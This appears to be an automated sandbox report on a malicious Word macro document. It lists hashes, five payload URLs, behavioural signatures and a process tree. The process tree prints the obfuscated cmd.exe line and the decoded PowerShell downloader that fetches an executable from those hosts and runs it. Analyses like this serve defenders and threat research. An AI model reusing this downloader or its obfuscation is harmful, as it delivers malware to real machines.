Analysis
-
max time kernel
136s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
26-05-2024 02:11
Behavioral task
behavioral1
Sample
7404ebd4dec5eea586afc4b4a020e294_JaffaCakes118.doc
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
7404ebd4dec5eea586afc4b4a020e294_JaffaCakes118.doc
Resource
win10v2004-20240508-en
General
-
Target
7404ebd4dec5eea586afc4b4a020e294_JaffaCakes118.doc
-
Size
70KB
-
MD5
7404ebd4dec5eea586afc4b4a020e294
-
SHA1
374ef9c64d3649d4951ae816ad4507346dbba609
-
SHA256
3d1d782eab81acc5eaab2e00bef6c52112f5511aeae6cc13236f99cdbf252f47
-
SHA512
ad0e418cec3d5881d41ec94106b5308079d126af947d43cbccc516d0affcaa90ff03d16ff78b49005030791a7413853d61c00bfb0625d5abf507901009a119d0
-
SSDEEP
768:BpJcaUitGAlmrJpmxlzC+w99NBE+1oIouCkqeW23/rMlnv:BptJlmrJpmxlRw99NBE+aID1/rI
Malware Config
Extracted
http://boloshortolandia.com/ozylgj6Z6
http://ncvascular.com.au/69V3Cpx
http://inmayjose.es/IB8JhFSXiV
http://lalievre.ca/O0Pmale
http://makmedia.ch/b5jSC1b
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4272 3776 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 10 IoCs
Processes:
powershell.exeflow pid process 26 1052 powershell.exe 86 1052 powershell.exe 88 1052 powershell.exe 90 1052 powershell.exe 91 1052 powershell.exe 93 1052 powershell.exe 96 1052 powershell.exe 98 1052 powershell.exe 102 1052 powershell.exe 103 1052 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
cmd.exepid process 4272 cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3776 WINWORD.EXE 3776 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1052 powershell.exe 1052 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1052 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 3776 WINWORD.EXE 3776 WINWORD.EXE 3776 WINWORD.EXE 3776 WINWORD.EXE 3776 WINWORD.EXE 3776 WINWORD.EXE 3776 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid process target process PID 3776 wrote to memory of 4272 3776 WINWORD.EXE cmd.exe PID 3776 wrote to memory of 4272 3776 WINWORD.EXE cmd.exe PID 4272 wrote to memory of 1052 4272 cmd.exe powershell.exe PID 4272 wrote to memory of 1052 4272 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7404ebd4dec5eea586afc4b4a020e294_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3776 -
C:\Windows\SYSTEM32\cmd.execmd /V^:^ON/C"^s^e^t ^i^T=^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hc^t^ac^};ka^erb^;^Hnd$^ me^tI-^e^kovn^I^;)Hn^d^$^ ^,^w^jW^$(^e^liFd^a^o^lnwo^D.^jk^d^${yr^t{)ICz$^ ni ^w^jW$(hc^aero^f^;^'ex^e.'+Tv^s$+'\^'^+c^i^l^bup:vne$^=Hn^d$;^'22'^ ^=^ ^Tvs$;)^'^@'(ti^l^p^S^.'^b^1C^Sj^5b/hc^.aidemk^am//:^p^tt^h^@^el^a^m^P^0^O/ac.^erv^eil^al//:^pt^t^h@ViXSF^h^J^8^B^I/s^e^.^es^o^j^y^amni//^:^p^t^t^h@x^pC3V96/^ua^.moc^.r^a^l^uc^s^avcn//:p^tth^@6^Z6^j^glyz^o/moc.^aidn^a^l^otro^hs^o^lo^b//:p^tth'^=ICz$^;tneilCb^e^W.t^eN^ ^tc^e^j^b^o-wen^=^j^k^d^$ ^l^lehsre^wop&&^f^or /^L %^M ^in (3^64^;^-^1;0)d^o ^s^e^t Cr^9^S=!Cr^9^S!!^i^T:~%^M,1!&&i^f %^M=^=^0 c^a^ll %Cr^9^S:^~^6%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $dkj=new-object Net.WebClient;$zCI='http://boloshortolandia.com/ozylgj6Z6@http://ncvascular.com.au/69V3Cpx@http://inmayjose.es/IB8JhFSXiV@http://lalievre.ca/O0Pmale@http://makmedia.ch/b5jSC1b'.Split('@');$svT = '22';$dnH=$env:public+'\'+$svT+'.exe';foreach($Wjw in $zCI){try{$dkj.DownloadFile($Wjw, $dnH);Invoke-Item $dnH;break;}catch{}}3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1052
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82